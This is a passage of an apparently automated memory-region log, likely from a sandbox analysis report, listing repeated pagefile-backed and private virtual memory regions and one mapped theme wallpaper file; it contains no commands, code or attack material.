region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20106 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20107 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20108 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20109 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20110 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20111 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20112 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20113 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20114 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20115 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20116 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20117 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20118 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20119 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20120 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20121 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20122 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20123 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20124 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20125 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 20126 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 20127 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20128 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20129 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20130 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20131 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20132 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20133 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20134 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20135 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20136 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20137 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 20138 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 20139 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20140 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20141 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20142 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20143 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20144 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20145 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20146 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20147 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20148 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20149 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20150 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20151 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20152 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20153 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20154 start_va = 0x54a0000 end_va = 0x5509fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cachedimage_1440_900_pos4.jpg" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\CachedFiles\\CachedImage_1440_900_POS4.jpg" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\windows\\themes\\cachedfiles\\cachedimage_1440_900_pos4.jpg") Region: id = 20155 start_va = 0x9870000 end_va = 0x9d61fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009870000" filename = "" Region: id = 20156 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20157 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20158 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20159 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20160 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20161 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20162 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20163 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20164 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20165 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20166 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20167 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20168 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20169 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20170 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20171 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20172 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20173 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20174 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20175 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20176 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20177 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20178 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20179 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20180 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20181 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20182 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20183 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 20184 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 20185 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20186 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20187 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20188 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20189 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20190 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20191 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20192 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20193 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20194 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20195 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20196 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20197 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20198 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20199 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20200 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20201 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20202 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20203 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20204 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20205 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20206 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20207 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20208 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20209 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20210 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20211 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20212 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20213 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20214 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20215 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20216 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20217 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20218 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20219 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20220 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20221 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20222 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20223 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20224 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20225 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20226 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20227 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20228 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20229 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20230 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20231 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20232 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20233 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20234 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20235 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20236 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20237 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20238 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20239 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20240 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20241 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20242 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20243 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20244 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20245 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20246 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20247 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 20248 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 20249 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20250 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20251 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20252 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20253 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20254 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 20255 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 20256 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20257 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20258 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20259 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20260 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20261 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20262 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20263 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20264 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20265 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20266 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20267 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 20268 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 20269 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20270 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20271 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20272 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20273 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20274 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20275 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20276 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20277 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20278 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20279 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20280 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20281 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20282 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20283 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20284 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20285 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20286 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20287 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20288 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20289 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20290 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20291 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 